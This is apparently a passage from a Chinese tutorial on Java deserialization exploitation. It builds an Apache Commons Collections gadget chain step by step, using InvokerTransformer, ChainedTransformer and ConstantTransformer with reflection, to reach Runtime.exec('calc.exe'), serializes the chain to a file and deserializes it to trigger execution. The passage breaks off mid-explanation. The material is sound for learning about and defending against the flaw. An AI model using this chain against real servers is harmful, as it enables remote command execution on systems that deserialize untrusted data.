\/\/\u795e\u5947\u7b2c\u4e8c\u5904\uff1a\u670d\u52a1\u7aef\u9700\u8981\u5c06\u5ba2\u6237\u7aef\u8f93\u5165\u53cd\u5e8f\u5217\u5316\u6210InvokerTransformer\u683c\u5f0f\uff0c\u5e76\u5728\u670d\u52a1\u7aef\u81ea\u4e3b\u4f20\u5165\u6076\u610f\u53c2\u6570inputInvokerTransformer a_in = (InvokerTransformer) fin.readObject;a_in.transform(input);}<\/p>\n

            \u6211\u4eec\u4f1a\u53d1\u73b0\u5982\u679c\u6211\u4eec\u8981\u76f4\u63a5\u5229\u7528\u8fd9\u4e2a\u53cd\u5c04\u673a\u5236\u4f5c\u4e3a\u6f0f\u6d1e\u7684\u8bdd\uff0c\u9700\u8981\u670d\u52a1\u7aef\u7684\u5f00\u53d1\u4eba\u5458\uff1a<\/p>\n

              \n
            1. \u5e2e\u6211\u4eec\u5199\u4e00\u4e2apayload\u4f5c\u4e3ainput\uff1b<\/li>\n
            2. \u63a5\u53d7\u5ba2\u6237\u7aef\u8f93\u5165\u53c2\u6570\uff0c\u53cd\u5e8f\u5217\u5316\u6210InvokerTransformer\u7c7b<\/li>\n
            3. \u518d\u523b\u610f\u8c03\u7528InvokerTransformer\u7c7b\u7684transform\u51fd\u6570<\/li>\n<\/ol>\n

              \u5b9e\u9645\u4e0a\u2026..\u53ea\u6709\u5f00\u53d1\u4eba\u5458\u662f\u81ea\u5df1\u4eba\u7684\u60c5\u51b5\u4e0b\u624d\u6ee1\u8db3\u6761\u4ef6\u5427\u2026\u2026\u6240\u4ee5\u6211\u4eec\u9762\u4e34\u4e00\u4e9b\u95ee\u9898\uff1a<\/p>\n

                \n
              1. payload\u80af\u5b9a\u9700\u8981\u5728\u5ba2\u6237\u7aef\u53ef\u4ee5\u81ea\u5b9a\u4e49\u6784\u9020\uff0c\u518d\u4f20\u8f93\u8fdb\u5165\u670d\u52a1\u7aef<\/li>\n
              2. \u670d\u52a1\u7aef\u9700\u8981\u628a\u6211\u4eec\u7684\u8f93\u5165exp\u53cd\u5e8f\u5217\u5316\u6210\u4e00\u4e2a\u5728\u4ee3\u7801\u4e2d\u53ef\u80fd\u4f7f\u7528\u5230\u7684\u7c7b<\/li>\n
              3. \u5e76\u4e14\u5728\u4ee3\u7801\u6b63\u5e38\u64cd\u4f5c\u4e2d\u4f1a\u8c03\u7528\u8fd9\u4e2a\u7c7b\u4e2d\u7684\u4e00\u4e2a\u53ef\u89e6\u53d1\u6f0f\u6d1e\u5730\u51fd\u6570(\u5f53\u7136\u8fd9\u4e2a\u51fd\u6570\u6700\u540e\u4f1a\u8fdb\u5165\u6211\u4eecInvokerTransformer\u7c7b\u7684transform\u51fd\u6570\uff0c\u4ece\u800c\u5f62\u6210\u547d\u4ee4\u6267\u884c)<\/li>\n
              4. \u5982\u679c\u8fd9\u4e2a\u53cd\u5e8f\u5217\u5316\u7684\u7c7b\u548c\u8fd9\u4e2a\u7c7b\u89e6\u53d1\u547d\u4ee4\u6267\u884c\u7684\u65b9\u6cd5\u53ef\u4ee5\u5728\u4e00\u4e2areadObject\u590d\u5199\u51fd\u6570\u4e2d\u6070\u597d\u89e6\u53d1\uff0c\u5c31\u5bf9\u4e8e\u670d\u52a1\u7aef\u4e0a\u4e0b\u6587\u8bed\u53e5\u6ca1\u6709\u8981\u6c42\u4e86\uff01<\/li>\n<\/ol>\n

                \u8fd9\u8fb9\u5047\u5982\u50cf\u9884\u671f\u8fd9\u6837\uff0c\u662f\u5bf9\u670d\u52a1\u7aef\u4e0a\u4e0b\u6587\u6ca1\u6709\u8981\u6c42\uff0c\u56e0\u4e3a\u53ea\u8981\u6267\u884creadObject\u5c31\u80af\u5b9a\u4f1a\u547d\u4ee4\u6267\u884c\uff0c\u4e0d\u9700\u8981\u5176\u4ed6\u4e0a\u4e0b\u6587\u6761\u4ef6\u3002<\/p>\n

                \u4f46\u662f\u5bf9\u4e8e\u670d\u52a1\u7aef\u7248\u672c\u73af\u5883\u662f\u6709\u8981\u6c42\u7684\uff0c\u4e4b\u540e\u4f1a\u8bf4\u5230<\/p>\n

                \u90a3\u4e48\u6211\u4eec\u4e00\u4e2a\u4e2a\u6765\u89e3\u51b3\u95ee\u9898\uff1a\u9996\u5148\u4f7f\u5ba2\u6237\u7aef\u81ea\u5b9a\u4e49paylaod\uff01<\/p>\n

                \u7b2c\u4e8c\u6b65 ChainedTransformer<\/strong><\/p>\n

                \u4e0b\u9762\u6211\u4eec\u9700\u8981\u5173\u6ce8ChainedTransformer\u8fd9\u4e2a\u7c7b,\u9996\u5148\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7c7b\u7684\u63cf\u8ff0\uff1a<\/p>\n

                \/*** Transformer implementation that chains the specified transformers together.* <\/p>\n

                * The input object is passed to the first transformer. The transformed result* is passed to the second transformer and so on.*\u5c06\u6307\u5b9a\u7684\u8f6c\u6362\u5668\u8fde\u63a5\u5728\u4e00\u8d77\u7684\u8f6c\u5316\u5668\u5b9e\u73b0\u3002\u8f93\u5165\u7684\u5bf9\u8c61\u5c06\u88ab\u4f20\u9012\u5230\u7b2c\u4e00\u4e2a\u8f6c\u5316\u5668\uff0c\u8f6c\u6362\u7ed3\u679c\u5c06\u4f1a\u8f93\u5165\u5230\u7b2c\u4e8c\u4e2a\u8f6c\u5316\u5668\uff0c\u5e76\u4ee5\u6b64\u7c7b\u63a8<\/p>\n

                \u53ef\u4ee5\u77e5\u9053\u4ed6\u4f1a\u628a\u6211\u4eec\u7684Transformer\u53d8\u6210\u4e00\u4e2a\u4e32\uff0c\u518d\u9010\u4e00\u6267\u884c\uff0c\u5176\u4e2d\u8fd9\u4e2a\u64cd\u4f5c\u5bf9\u5e94\u7684\u5c31\u662fChainedTransformer\u7c7b\u7684transform\u51fd\u6570<\/p>\n

                \/*** Transforms the input to result via each decorated transformer** @param object the input object passed to the first transformer* @return the transformed result*\/public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) {object = iTransformers[i].transform(object);} return object;}<\/p>\n

                \u8fd9\u91cc\u4f1a\u904d\u5386iTransformers\u6570\u7ec4\uff0c\u4f9d\u6b21\u8c03\u7528\u8fd9\u4e2a\u6570\u7ec4\u4e2d\u6bcf\u4e00\u4e2aTransformer\u7684transform\uff0c\u5e76\u4e32\u884c\u4f20\u9012\u6267\u884c\u7ed3\u679c\u3002<\/p>\n

                \u9996\u5148\u786e\u5b9aiTransformers\u53ef\u63a7\uff0ciTransformers\u6570\u7ec4\u662f\u901a\u8fc7ChainedTransformer\u7c7b\u7684\u6784\u9020\u51fd\u6570\u8d4b\u503c\u7684\uff1a<\/p>\n

                \/*** Constructor that performs no validation.* Use getInstance<\/code> if you want that.** @param transformers the transformers to chain, not copied, no nulls*\/public ChainedTransformer(Transformer transformers) { super;\/\/\u8fd9\u4e2asuper\u4e0d\u6e05\u695a\u505a\u4e86\u5565\uff0ciTransformers = transformers;}<\/p>\n

                \u90a3\u4e48\u6211\u4eec\u77e5\u9053\u53ef\u4ee5\u81ea\u5b9a\u4e49iTransformers\u7684\u5185\u5bb9\uff0c\u6211\u4eec\u5df2\u6709\u6761\u4ef6\u5982\u4e0b\uff1a<\/p>\n

                \/\/\u6700\u7ec8\u6267\u884c\u76ee\u6807Class.forName(\"java.lang.Runtime\").getMethod(\"exec\", String.class).invoke(Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\"))\/\/\u6b64\u5904\u5728\u83b7\u53d6\u5b9e\u4f8b, \"calc.exe\") \/\/InvokeTransformer\u5173\u952e\u8bed\u53e5\uff1apublic Object transform(Object input) {Class cls = input.getClass;Method method = cls.getMethod(this.iMethodName, this.iParamTypes); return method.invoke(input, this.iArgs);}<\/p>\n

                \u518d\u770b\u5230InvokeTransformer\u4ee3\u7801\u6211\u4eec\u9700\u8981\u5f15\u51fa\u4e00\u4e2a\u6ce8\u610f\u70b9\uff1a<\/p>\n

                \u8fd9\u91cc\u6211\u4eec\u9700\u8981\u6ce8\u610f\u5230input.getClass\u8fd9\u4e2a\u65b9\u6cd5\u4f7f\u7528\u4e0a\u7684\u4e00\u4e9b\u533a\u522b\uff1a<\/p>\n

                  \n
                • \u5f53input\u662f\u4e00\u4e2a\u7c7b\u7684\u5b9e\u4f8b\u5bf9\u8c61\u65f6\uff0c\u83b7\u53d6\u5230\u7684\u662f\u8fd9\u4e2a\u7c7b<\/li>\n
                • \u5f53input\u662f\u4e00\u4e2a\u7c7b\u65f6\uff0c\u83b7\u53d6\u5230\u7684\u662fjava.lang.Class<\/li>\n<\/ul>\n

                  \u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u4ee3\u7801\u9a8c\u8bc1\uff0c\u8fd9\u91cc\u4e0d\u518d\u8d58\u8ff0<\/p>\n

                  Object a = Runtime.getRuntime;Class b = Runtime.class;System.out.println(a.getClass);System.out.println(b.getClass); \/\/\u7ed3\u679c\/\/class java.lang.Runtime\/\/class java.lang.Class<\/p>\n

                  \u57fa\u4e8e\u4e4b\u524d\u5199\u7684\u4ee3\u7801\uff1a<\/p>\n

                  \/\/\u53ea\u8c03\u7528InvokeTransformer\u7684\u60c5\u51b5\u5982\u4e0b\uff1aInvokerTransformer a = new InvokerTransformer( \"exec\", new Class{String.class}, new String{\"calc.exe\"});Object input=Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\"));<\/p>\n

                  \u6211\u4eec\u4e5f\u53ef\u4ee5\u77e5\u9053input\u7684\u4e3aRuntime\u7c7b\u7684\u5bf9\u8c61\uff0c\u6240\u4ee5cls\u5c31\u662fRuntime\u7c7b\uff0c\u6240\u4ee5cls.getMethod\u53ef\u4ee5\u627e\u5230exec\u65b9\u6cd5\uff0c\u76f4\u63a5\u8fdb\u884c\u8c03\u7528\u3002<\/p>\n

                  \u5148\u628aa\u5c01\u88c5\u6210ChainedTransformer\u683c\u5f0f\uff0c\u4f46\u662fpayload\u8fd8\u662f\u5728\u5916\u9762<\/p>\n

                  \/\/\u5ba2\u6237\u7aef\u6784\u9020payloadTransformer transformers = new Transformer { new InvokerTransformer(\"exec\",new Class{String.class},new String{\"calc.exe\"});}Transformer transformerChain = new ChainedTransformer(transformers); \/\/\u670d\u52a1\u7aef\u89e6\u53d1\u6240\u9700\u5185\u5bb9Object input=Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\"));transformerChain.transform(input);\/\/\u6b64\u5904\u5fc5\u987b\u4e3ainput\uff0c\u4f5c\u4e3a\u7b2c\u4e00\u4e2a\u8f93\u5165<\/p>\n

                  \u628apayload\u653e\u5165Transformer\u6570\u7ec4\u4e2d\uff0c\u9700\u8981\u8f6c\u5316\u6210\u7279\u5b9a\u7684Transformer\u683c\u5f0f\u624d\u884c\u3002<\/p>\n

                  \u7b2c\u4e8c\u70b9\u4e94\u6b65 ConstantTransformer -> Runtime\u5b9e\u4f8b\u5e8f\u5217\u5316<\/strong><\/p>\n

                  \u6211\u4eec\u627e\u5230ConstantTransformer\u7c7b\u8ddfInvokkerTransformer\u4e00\u6837\u7ee7\u627fTransforme\u7236\u7c7b\uff0c\u53ef\u4ee5\u8fdb\u5165\u6570\u7ec4\u987e\u540d\u601d\u4e49ConstantTransformer\u7c7b\u5176\u5b9e\u5c31\u53ea\u4f1a\u5b58\u653e\u4e00\u4e2a\u5e38\u91cf\uff1b\u5b83\u7684\u6784\u9020\u51fd\u6570\u4f1a\u5199\u5165\u8fd9\u4e2a\u53d8\u91cf\uff0c\u4ed6\u7684transform\u51fd\u6570\u4f1a\u8fd4\u56de\u8fd9\u4e2a\u53d8\u91cf\u3002\u628aRuntime\u5b9e\u4f8b\u5199\u5165\u8fd9\u4e2a\u53d8\u91cf\uff1a<\/p>\n

                  Transformer transformers = new Transformer { \/\/\u4ee5\u4e0b\u4e24\u4e2a\u8bed\u53e5\u7b49\u540c,\u4e00\u4e2a\u662f\u901a\u8fc7\u53cd\u5c04\u673a\u5236\u5f97\u5230\uff0c\u4e00\u4e2a\u662f\u76f4\u63a5\u8c03\u7528\u5f97\u5230Runtime\u5b9e\u4f8b\/\/ new ConstantTransformer(Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\"))),new ConstantTransformer(Runtime.getRuntime), new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})};Transformer transformerChain = new ChainedTransformer(transformers);transformerChain.transform(null);\/\/\u6b64\u5904\u8f93\u5165\u53ef\u4ee5\u4e3a\u4efb\u610f\u503c\uff0c\u56e0\u4e3a\u4e0d\u4f1a\u88ab\u4f7f\u7528\u5230\uff0c\u76f8\u5f53\u4e8e\u521d\u59cb\u7b2c\u4e00\u4e2a\u8f93\u5165\u4e3a\u6211\u4eec\u8bbe\u7f6e\u7684\u5e38\u91cf<\/p>\n

                  \u4ee5\u4e0a\u4ee3\u7801\u53ef\u4ee5\u6210\u529f\u5f39\u6846\u6267\u884c\uff01\u90a3\u4e48\u6211\u4eec\u6a21\u62df\u4e00\u4e0b\u5e8f\u5217\u5316\u4e0e\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\uff01<\/p>\n

                  \/\/\u5ba2\u6237\u7aef\u6784\u9020payloadTransformer transformers = new Transformer { new ConstantTransformer(Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\"))), new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})};Transformer transformerChain = new ChainedTransformer(transformers); \/\/payload\u5e8f\u5217\u5316\u5199\u5165\u6587\u4ef6\uff0c\u6a21\u62df\u7f51\u7edc\u4f20\u8f93FileOutputStream f = new FileOutputStream(\"payload.bin\");ObjectOutputStream fout = new ObjectOutputStream(f);fout.writeObject(transformerChain); \/\/\u670d\u52a1\u7aef\u53cd\u5e8f\u5217\u5316payload\u8bfb\u53d6FileInputStream fi = new FileInputStream(\"payload.bin\");ObjectInputStream fin = new ObjectInputStream(fi); \/\/\u670d\u52a1\u7aef\u53cd\u5e8f\u5217\u5316\u6210ChainedTransformer\u683c\u5f0f\uff0c\u5e76\u5728\u670d\u52a1\u7aef\u81ea\u4e3b\u4f20\u5165\u6076\u610f\u53c2\u6570inputTransformer transformerChain_now = (ChainedTransformer) fin.readObject;transformerChain_now.transform(null);<\/p>\n

                  \u4f46\u662f\u5f88\u9057\u61be\u7684\u544a\u8bc9\u4ee5\u4e3a\u5feb\u8981\u6210\u529f\u7684\u4f60\uff0c\u6210\u529f\u7684\u672c\u5730\u6d4b\u8bd5\u52a0\u4e0a\u5e8f\u5217\u5316\u3001\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e4b\u540e\u5c31\u4f1a\u5931\u8d25\u3002\u56e0\u4e3aRuntime\u7c7b\u7684\u5b9a\u4e49\u6ca1\u6709\u7ee7\u627fSerializable\u7c7b\uff0c\u6240\u4ee5\u662f\u4e0d\u652f\u6301\u53cd\u5e8f\u5217\u5316\u7684\u3002<\/p>\n

                  \n \"apache\n <\/div>\n

                  \u90a3\u4e48\u6211\u4eec\u5728payload\u5199\u5165Runtime\u5b9e\u4f8b\u7684\u8ba1\u5212\u5c31\u6ce1\u6c64\u4e86\u3002<\/p>\n

                  \u7b2c\u4e8c\u70b9\u516b\u6b65 \u5728\u670d\u52a1\u7aef\u751f\u6210Runtime\u5b9e\u4f8b<\/strong><\/p>\n

                  \u65e2\u7136\u6211\u4eec\u6ca1\u6cd5\u5728\u5ba2\u6237\u7aef\u5e8f\u5217\u5316\u5199\u5165Runtime\u7684\u5b9e\u4f8b\uff0c\u90a3\u5c31\u8ba9\u670d\u52a1\u7aef\u6267\u884c\u6211\u4eec\u7684\u547d\u4ee4\u751f\u6210\u4e00\u4e2aRuntime\u5b9e\u4f8b\u5457\uff1f\u6211\u4eec\u77e5\u9053Runtime\u7684\u5b9e\u4f8b\u662f\u901a\u8fc7Runtime.getRuntime\u6765\u83b7\u53d6\u7684\uff0c\u800cInvokerTransformer\u91cc\u9762\u7684\u53cd\u5c04\u673a\u5236\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u51fd\u6570\u3002\u540c\u65f6\uff0c\u6211\u4eec\u5df2\u7ecf\u6210\u529f\u6267\u884c\u8fc7Runtime\u7c7b\u91cc\u9762\u7684exec\u51fd\u6570\u3002\u8bb2\u9053\u7406\u80af\u5b9a\u662f\u6ca1\u95ee\u9898\u7684.<\/p>\n

                  \u6211\u4eec\u5148\u770bgetRuntiime\u65b9\u6cd5\u7684\u53c2\u6570<\/p>\n

                  public static Runtime getRuntime { return currentRuntime;}<\/p>\n

                  \u6ca1\u6709\u53c2\u6570\uff0c\u90a3\u5c31\u975e\u5e38\u7b80\u5355\u4e86<\/p>\n

                  Transformer transformers = new Transformer { new ConstantTransformer(Runtime.class),\/\/\u5f97\u5230Runtime class\/\/\u7531\u4e8eInvokerTransformer\u7684\u6784\u9020\u51fd\u6570\u8981\u6c42\u4f20\u5165Class\u7c7b\u578b\u7684\u53c2\u6570\u7c7b\u578b\uff0c\u548cObject\u7c7b\u578b\u7684\u53c2\u6570\u6570\u503c\uff0c\u6240\u4ee5\u5c01\u88c5\u4e00\u4e0b\uff0c\u4e0b\u9762\u4e5f\u4e00\u6837\/\/\u4e0a\u9762\u4f20\u5165Runtime.class\uff0c\u8c03\u7528Runtime class\u7684getRuntime\u65b9\u6cd5(\u7531\u4e8e\u662f\u4e00\u4e2a\u9759\u6001\u65b9\u6cd5\uff0cinvoke\u8c03\u7528\u9759\u6001\u65b9\u6cd5\uff0c\u4f20\u5165\u7c7b\u5373\u53ef)new InvokerTransformer(\"getRuntime\",new Class{},new Object{}), \/\/\u4e0a\u9762Runtime.getRuntime\u5f97\u5230\u4e86\u5b9e\u4f8b\uff0c\u4f5c\u4e3a\u8fd9\u8fb9\u7684\u8f93\u5165(invoke\u8c03\u7528\u666e\u901a\u65b9\u6cd5\uff0c\u9700\u8981\u4f20\u5165\u7c7b\u7684\u5b9e\u4f8b)new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})};Transformer transformerChain = new ChainedTransformer(transformers);transformerChain.transform(null);<\/p>\n

                  \u5728\u8fd9\u91cc\uff0c\u4e4b\u524d\u81ea\u5df1\u9677\u5165\u4e86\u4e00\u4e2a\u5f88\u50bb\u903c\u7684\u95ee\u9898\uff0c\u5373\uff1aInvokerTransformer\u7c7btransform\u65b9\u6cd5\u4e2dreturn method.invoke\u8fd9\u4e2a\u8bed\u53e5invoke\u8c03\u7528\u5230\u5e95return\u4e86\u5565?\u56e0\u4e3a\u5728\u8fd9\u91cc\u5f62\u6210\u4e86\u4e00\u4e2a\u8c03\u7528return\u7684\u7ed3\u679c\uff0c\u518d\u8c03\u7528\u7684\u94fe\u3002\u4e3a\u4ec0\u4e48\u5c31\u53ef\u4ee5\u4e0a\u4e00\u4e2a\u8f93\u51fa\u4f5c\u4e3a\u4e0b\u4e00\u4e2a\u8f93\u5165\u65f6\uff0c\u53ef\u4ee5\u6210\u529f\u8c03\u7528\u4e86\u5462\uff1f\u4e00\u5f00\u59cb\u4ee5\u4e3ainvoke\u4f1a\u7edf\u4e00\u8fd4\u56de\u4e00\u4e2a\u5bf9\u8c61\u4f5c\u4e3a\u4e0b\u4e00\u4e2a\u8f93\u5165\u4ec0\u4e48\u7684\uff0c\u5e76\u4e14\u5728\u8c03\u8bd5\u7684\u65f6\u5019\u6bcf\u6b21invoke\u7684\u7ed3\u679c\u90fd\u4e0d\u4e00\u6837\uff0c\u6e90\u7801\u770b\u7684\u5934\u6655\u3002\u5b9e\u9645\u4e0a\u662f\u94bb\u4e86\u6b7b\u80e1\u540c\uff1ainvoke\u7684return\u662f\u6839\u636e\u88ab\u8c03\u7528\u7684\u51fd\u6570return\u5565\uff0cinvoke\u5c31return\u5565\u3002\u5c31\u597d\u6bd4\u6211invoke\u4e00\u4e2a\u6211\u81ea\u5b9a\u4e49\u7684\u65b9\u6cd5a\uff0c\u5728a\u4e2d\uff0c\u6211return\u4e86\u5b57\u7b26\u4e32\"1\"\u3002\u90a3\u4e48\u5c31\u662finvoke\u7684\u7ed3\u679c\u5c31\u662f\u5b57\u7b26\u4e32\"1\"\u3002\u770b\u4ee5\u4e0a\u7684\u8fc7\u7a0b\u5c31\u662f\u7b2c\u4e00\u6b21Runtime.getRuntime\u7684\u7ed3\u679c\u8f93\u5165\u4e86\u4e0b\u4e00\u4e2aInvokerTransformer<\/p>\n

                  \u4ee5\u4e0a\u611f\u89c9\u662f\u4e07\u4e8b\u5927\u5409\u4e86\uff01\u4f46\u662f\u5b9e\u9645\u4e0a\u5e76\u4e0d\u662f\u2026<\/p>\n

                  \u56de\u60f3\u4e4b\u524d\u5bf9\u4e8eInvokerTransformer\u4e2dClass cls = input.getClass;\u7684\u89e3\u91ca<\/p>\n

                    \n
                  • \u8fd9\u91cc\u6211\u4eec\u9700\u8981\u6ce8\u610f\u5230input.getClass\u8fd9\u4e2a\u65b9\u6cd5\u4f7f\u7528\u4e0a\u7684\u4e00\u4e9b\u533a\u522b\uff1a<\/li>\n
                  • \u5f53input\u662f\u4e00\u4e2a\u7c7b\u7684\u5b9e\u4f8b\u5bf9\u8c61\u65f6\uff0c\u83b7\u53d6\u5230\u7684\u662f\u8fd9\u4e2a\u7c7b<\/li>\n<\/ul>\n

                    \u5f53input\u662f\u4e00\u4e2a\u7c7b\u65f6\uff0c\u83b7\u53d6\u5230\u7684\u662fjava.lang.Class<\/p>\n

                    \u6211\u4eec\u6765\u63a8\u6f14\u7b2c\u4e00\u6b21InvokerTransformer\u7684\u53cd\u5c04\u8c03\u7528\uff0c\u5373\u5f97\u5230Runtime\u7c7b\u5bf9\u8c61\u7684getRuntime\u65b9\u6cd5\u8c03\u7528:<\/p>\n

                    \/\/InvokeTransformer\u5173\u952e\u8bed\u53e5\uff1apublic Object transform(Object input) {\/\/input\u4e3a\u6211\u4eec\u8bbe\u7f6e\u7684\u5e38\u91cfRuntime.classClass cls = input.getClass;\/\/\uff01\uff01\uff01\u8fd9\u91cc\u7531\u4e8einput\u662f\u4e00\u4e2a\u7c7b\uff0c\u4f1a\u5f97\u5230java.lang.Class\/\/\u5728java.lang.Class\u7c7b\u4e2d\u53bb\u5bfb\u627egetRuntime\u65b9\u6cd5\u4f01\u56fe\u5f97\u5230Runtime\u7c7b\u5bf9\u8c61\uff0c\u6b64\u5904\u62a5\u9519\uff01\uff01Method method = cls.getMethod(this.iMethodName, this.iParamTypes); return method.invoke(input, this.iArgs);}<\/p>\n

                    \u90a3\u4e48\u6211\u4eec\u597d\u50cf\u9677\u5165\u4e86\u4e00\u4e2a\u6b7b\u80e1\u540c\uff1a\u5f97\u5230Runtime\u7c7b\u5b9e\u4f8b\u624d\u80fd\u8c03\u7528exec\u65b9\u6cd5\u3002\u800c\u5f97\u5230Runtime\u7c7b\u5b9e\u4f8b\u4f5c\u4e3ainput\uff0c\u624d\u80fd\u5f97\u5230Runtime class\uff0c\u624d\u80fd\u627e\u5230getRuntime\u65b9\u6cd5\uff0c\u5f97\u5230Runtime\u7c7b\u5b9e\u4f8b\u2026\u2026\u2026<\/p>\n

                    \u2026\u2026\u2026\u2026\u2026\u2026\u2026\u975e\u5e38\u7684\u5c34\u5c2c\u2026\u2026\u2026\u2026\u2026\u2026\u2026..<\/p>\n

                    \u7b2c\u4e8c\u70b9\u4e5d\u6b65 \u8fd8\u662f\u53cd\u5c04\u673a\u5236<\/strong><\/p>\n

                    \u90a3\u4e48\u6211\u4eec\u901a\u8fc7\u76f4\u63a5\u8c03\u7528Runtime.getRuntime\u65b9\u6cd5\u597d\u50cf\u662f\u884c\u4e0d\u901a\u4e86,\u6709\u6ca1\u6709\u5176\u4ed6\u65b9\u6cd5\u5462\uff1f<\/p>\n

                    \u8fd8\u662f\u53cd\u5c04\u673a\u5236<\/strong><\/p>\n

                    \u5df2\u77e5\uff1a<\/p>\n

                      \n
                    1. \u6211\u4eec\u5f00\u5934\u4e0d\u80fd\u83b7\u5f97Class.forName(\"java.lang.Runtime\")\uff0c\u53ea\u80fd\u5f97\u5230Class.forName(\"java.lang.Class\")<\/li>\n
                    2. \u6211\u4eec\u53ef\u4ee5\u6709\u4efb\u610f\u7684\u53cd\u5c04\u673a\u5236\u6c42\uff1a<\/li>\n
                    3. \u6211\u4eec\u8981\u83b7\u53d6\u5230Runtime.getRunime\u51fd\u6570\uff0c\u5e76\u6267\u884c\u5b83\u3002\u89e3\uff1a<\/li>\n
                    4. \u901a\u8fc7\u53cd\u5c04\u673a\u5236\u83b7\u53d6\u53cd\u5c04\u673a\u5236\u4e2d\u7684getMethod\u7c7b\uff0c\u7531\u4e8egetMethod\u7c7b\u662f\u5b58\u5728Class\u7c7b\u4e2d\uff0c\u5c31\u7b26\u5408\u5f00\u5934Class\u7c7b\u7684\u9650\u5236<\/li>\n
                    5. \u901a\u8fc7getMethod\u51fd\u6570\u83b7\u53d6Runtime\u7c7b\u4e2d\u7684getRuntime\u51fd\u6570<\/li>\n
                    6. \u5728\u54ea\u4e2a\u7c7b\u4e2d\u8c03\u7528getMethod\u53bb\u83b7\u53d6\u65b9\u6cd5\uff0c\u5b9e\u9645\u4e0a\u662f\u7531invoke\u51fd\u6570\u91cc\u9762\u7684\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570obj\u51b3\u5b9a\u7684<\/li>\n
                    7. \u518d\u901a\u8fc7\u53cd\u5c04\u673a\u5236\u83b7\u53d6\u53cd\u5c04\u673a\u5236\u4e2d\u7684invoke\u7c7b\uff0c\u6267\u884c\u4e0a\u9762\u83b7\u53d6\u7684getRuntime\u51fd\u6570<\/li>\n
                    8. invoke\u8c03\u7528getRuntime\u51fd\u6570\uff0c\u83b7\u53d6Runtime\u7c7b\u7684\u5b9e\u4f8b\u8fd9\u91cc\u5728\u4f7f\u7528\u53cd\u5c04\u673a\u5236\u8c03\u7528getRuntime\u9759\u6001\u7c7b\u65f6\uff0cinvoke\u91cc\u9762\u7b2c\u4e00\u4e2a\u53c2\u6570obj\u5176\u5b9e\u53ef\u4ee5\u4efb\u610f\u6539\u4e3anull\uff0c\u6216\u8005\u5176\u4ed6\u7c7b\uff0c\u800c\u4e0d\u4e00\u5b9a\u8981\u662fRuntime\u7c7b<\/li>\n<\/ol>\n

                      \u5177\u4f53\u53d8\u5316\u7ec6\u8282\uff0c\u6211\u9009\u62e9\u628a\u5b83\u653e\u5728\u53cd\u5c04\u673a\u5236\u4e00\u6587\u4e2d\u8bf4\u660e\uff0c\u8fd9\u8fb9\u7ed9\u51fa\u7ed3\u679c\u3002<\/p>\n

                      \u6211\u4eec\u7684\u6700\u7ec8\u76ee\u7684\u662f\u6267\u884cClass.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(Class.forName(\"java.lang.Runtime\")<\/p>\n

                      \u5148\u6765\u83b7\u53d6getRuntime\u7c7b<\/p>\n

                      \/\/\u76ee\u6807\u8bed\u53e5Class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\")\/\/\u4f7f\u7528java.lang.Class\u5f00\u5934Class.forName(\"java.lang.Class\").getMethod(\"getMethod\", new Class {String.class, Class.class }).invoke(Class.forName(\"java.lang.Runtime\"),\"getRuntime\",new Class[0]); \/\/invoke\u51fd\u6570\u7684\u7b2c\u4e00\u4e2a\u53c2\u6570\u662fRuntime\u7c7b\uff0c\u6211\u4eec\u9700\u8981\u5728Runtime\u7c7b\u4e2d\u53bb\u6267\u884cgetMethod\uff0c\u83b7\u53d6getRuntime\u53c2\u6570<\/p>\n

                      \u5bf9\u7167\u7740InvokerTransformer\u7c7b\u8f6c\u53d8\u4e3atransformers\u683c\u5f0f<\/p>\n

                      Class cls = input.getClass;\/\/cls = java.lang.ClassMethod method = cls.getMethod(this.iMethodName, this.iParamTypes); \/\/getMethod\u65b9\u6cd5return method.invoke(input, this.iArgs); \/\/\u5728Runtime\u4e2d\u627egetRuntime\u65b9\u6cd5\uff0c\u5e76\u8fd4\u56de\u8fd9\u4e2a\u65b9\u6cd5<\/p>\n

                      Transformer transformers = new Transformer { new ConstantTransformer(Runtime.class), new InvokerTransformer(\"getMethod\", new Class {String.class, Class.class }, new Object {\"getRuntime\", new Class[0] }), \/\/\u8fd8\u9700\u8981\u586b\u5145 \u8c03\u7528getRuntime\u5f97\u5230Runtime\u5b9e\u4f8b,new InvokerTransformer(\"exec\", new Class {String.class }, new Object {\"calc.exe\"})};<\/p>\n

                      \u8fd8\u5dee\u6267\u884c\u83b7\u53d6\u5230\u7684getRuntime\uff0c\u4e0b\u4e00\u4e2ainput\u662f\u4e0a\u4e00\u4e2a\u6267\u884c\u63a5\u53e3\uff0c\u7ee7\u7eed\u5bf9\u7167<\/p>\n

                      \/\/input=getRuntime\u8fd9\u4e2a\u65b9\u6cd5Class cls = input.getClass;\/\/cls = java.lang.Method(getRuntime\u65b9\u6cd5\u662fmethod\u7c7b)Method method = cls.getMethod(this.iMethodName, this.iParamTypes); \/\/\u5728method\u7c7b\u4e2d\u627e\u5230invoke\u65b9\u6cd5\uff0cmethod=invoke\u65b9\u6cd5return method.invoke(input, this.iArgs); \/\/\u8c03\u7528invoke\u65b9\u6cd5\uff0cinput=getRuntime\u8fd9\u4e2a\u65b9\u6cd5\uff0c\u4f20\u5165\u81ea\u5b9a\u4e49\u7684\u53c2\u6570<\/p>\n

